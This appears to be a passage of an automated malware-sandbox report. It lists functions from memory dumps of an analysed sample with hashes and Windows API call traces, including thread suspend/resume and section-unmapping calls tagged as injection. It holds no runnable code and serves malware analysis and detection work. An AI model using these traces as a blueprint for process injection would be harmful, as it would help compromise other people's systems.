  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
